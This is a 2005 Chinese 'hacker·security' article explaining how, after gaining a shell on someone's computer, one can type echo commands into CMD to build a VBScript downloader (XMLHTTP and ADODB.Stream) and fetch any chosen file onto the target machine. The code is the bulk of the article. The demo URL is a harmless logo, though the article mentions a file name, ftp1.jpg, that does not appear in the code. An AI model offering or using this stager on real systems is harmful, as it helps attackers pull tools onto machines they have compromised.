CMD中的玄机

黑客·安全

陈一天 · 2005年2月21日

当你取得一台计算机的Shell后，你可以做什么？如果我说可以在CMD中敲几条命令就可以下载指定程序，我想大多数朋友不会相信，其实不需要通过第三方软件而使用脚本就可以实现轻松下载。

下面是一个程序的示例的执行代码：

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs

echo xPost.Open "GET","http://bbs.cpcw.com/images/default/logo.gif",0 >>webdown.vbs

echo xPost.Send() >>webdown.vbs

echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs

echo sGet.Mode = 3 >>webdown.vbs

echo sGet.Type = 1 >>webdown.vbs

echo sGet.Open() >>webdown.vbs

echo sGet.Write(xPost.responseBody) >>webdown.vbs

echo sGet.SaveToFile "logo.jpg",2 >>webdown.vbs

将这些源码做成一个.bat文件或者一条一条在目标机的CMD中输入都可以，然后在CMD中运行cscript webdown.vbs。这样，电脑报的LOGO就被下载到当前的目录中了。

代码中，http://bbs.cpcw.com/images/default/logo.gif是路径，ftp1.jpg可以改成你要下载的文件名。

小知识：WSH是Windows Scripting Host（Windows脚本主机）的缩略形式。WSH这个概念最早出现于Windows 98操作系统，是一个基于32 位 Windows 平台并独立于语言的脚本运行环境。比如：你自己编写了一个脚本文件，如后缀为.vbs或.js的文件，然后在 Windows 下双击并执行它，系统就会自动调用一个适当的程序来对它进行解释并执行，而这个程序，就是 Windows Scripting Host，程序执行文件名为 Wscript.exe （若是在DOS命令提示符下，则为 Cscript.exe）。